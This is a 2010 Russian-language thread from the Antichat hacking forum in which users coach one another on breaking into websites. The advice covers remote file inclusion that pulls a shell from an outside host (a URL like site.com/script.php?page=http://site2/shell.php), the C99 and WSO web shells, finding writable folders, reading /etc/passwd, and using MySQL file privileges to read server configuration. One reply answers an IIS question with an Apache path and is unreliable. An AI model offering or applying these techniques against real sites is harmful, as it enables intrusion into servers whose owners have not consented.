HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14841  
Старый 22.08.2010, 18:40
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

kamaz, Если не ошибаюсь narod.ru не поддерживает язык php.
 
Ответить с цитированием

  #14842  
Старый 22.08.2010, 18:44
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от -PRIVAT-  
-PRIVAT- said:
kamaz
, Если не ошибаюсь narod.ru не поддерживает язык php.
На народе ничего не будет выполняться.

RFI заключается в том, что удаленный скрипт выполняется на сервере.

Следовательно сервер, на котором находится сайт site.ru считает с народа файл 123.php и выполнит его, скопировав файл shell.php в папку, доступную для записи.
 
Ответить с цитированием

  #14843  
Старый 22.08.2010, 18:48
against
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648

Репутация: 0
По умолчанию

Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.
 
Ответить с цитированием

  #14844  
Старый 22.08.2010, 18:50
against
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648

Репутация: 0
По умолчанию

я пробовал заходить через браузер папки, везде естественно -пермишн денайд!((
 
Ответить с цитированием

  #14845  
Старый 23.08.2010, 00:44
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от against  
against said:
Вы не могли бы, пожалуйста, подсказать скрипт какой-нибудь на поиск директории без зепрета на запись на пхп.
так через шелл заинклюженный посмотри. Или мозгами пораскинь, где могут быть папки, доступные для записи: в /images/, /uploads/, /files/ и т.п. Если сайт с возможностью публикации контента, файлов и картинок, то пути в html-коде сайта глянуть можно. А почему у тебя не работает шелл приинклюденный (site.com/script.php?page=http://site2/shell.php). С99, да и wso нормально в таком режиме работают.
 
Ответить с цитированием

  #14846  
Старый 23.08.2010, 01:28
against
Новичок
Регистрация: 03.06.2010
Сообщений: 0
Провел на форуме:
648

Репутация: 0
По умолчанию

Попугай, затруднение в том, что сайт совсем статичный, в шелле не показывает не одной папки доступной на запись, все инклуды извне не получаются, как и скачивание, вероятно как-то режутся фаером. По-ходу на этом сайте ниче путного не прокатит, только если MySQL ковырять((((((

Всем большое спасибо за помощь, и советы)))
 
Ответить с цитированием

  #14847  
Старый 23.08.2010, 17:32
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
Провел на форуме:
244235

Репутация: 39
По умолчанию

Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
 
Ответить с цитированием

  #14848  
Старый 23.08.2010, 18:07
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от roddik  
roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
/etc/httpd/conf/httpd.conf
 
Ответить с цитированием

  #14849  
Старый 23.08.2010, 18:22
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Посмотри так же тут: etc/passwd мб найдёшь что-нибудь...
 
Ответить с цитированием

  #14850  
Старый 23.08.2010, 18:33
k2b1~
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме:
5094

Репутация: 0
По умолчанию

Цитата:
Сообщение от roddik  
roddik said:
Привет. Есть серв на win64, mysql5 и iis 7. File_priv есть, прочел odbc.ini. Где находятся конфиги виртуальных хостов в иисе? Можно ли как-то узнать full path к сайту через конфиги? Спасибо
odbc.ini ? mssql ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ